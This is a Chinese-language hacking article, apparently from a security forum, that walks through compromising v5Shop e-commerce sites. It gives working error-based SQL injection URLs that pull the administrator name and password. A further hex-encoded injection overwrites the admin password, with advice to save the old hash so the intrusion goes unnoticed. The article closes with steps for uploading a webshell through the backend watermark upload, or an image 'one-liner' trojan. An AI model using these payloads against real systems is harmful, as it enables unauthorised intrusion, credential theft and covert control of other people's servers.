热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

v5Shop注入拿shell过程

发布时间:2010-07-10 00:28文章来源:t00ls文章作者:twygame 点击次数:
摘要:作者twygame 注入: 注入点如: http://0xsec.org/ commond.aspx?id=1 没办法union,只能让它暴错了 管理表名为:web_admin 管理员用户名字段为:name 管理员密码字段为:pass 暴管理员用户名:http://0xsec.org/commond.aspx?id=1 and 1=(select top 1 [name]...

作者twygame

注入:

注入点如:

http://0xsec.org/commond.aspx?id=1

没办法union,只能让它暴错了

管理表名为:web_admin

管理员用户名字段为:name
管理员密码字段为:pass

暴管理员用户名:http://0xsec.org/commond.aspx?id=1 and 1=(select top 1 [name] from web_admin)--


 
得到管理用户名为:admin
 
暴管理员密 码:http://0xsec.org/commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin)--
 

 
如果密码破不出来,可以通过注入更新其管理员的密码MD5值,当然事先要备份它原来的MD5值,方便恢复,以免管理察觉。
 
不过他过滤了单引号.只能把字符串转化成16进制的了
 
类似的,就是下面更新的SQL语句。
更新管理密码:
如:http://0xsec.org/commond.aspx?id=1 update web_admin set pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042004400450037004400450041003600340042003700430037004300

Webshell获取方法:

weblogin/System_Config_Operate.aspx

后台上传水印,可以直接上传大马。

 


 
上传后的地址是:
UploadFile\Picture\上传文件名
 
 
黑白主编:
不过,据我观察此方法有行不通之处,在漏洞爆发当晚,雪域小组内部群就以对V5Shop后台拿shell进行了讨论,貌似还没得到解决办法。
临时可用的方法为:当服务器支持ASP时,上传一图片一句话木马,连接之。

标签分类:

上一篇:浅析路径遍历漏洞
下一篇:获取保存在路由器中的ADSL账号和密码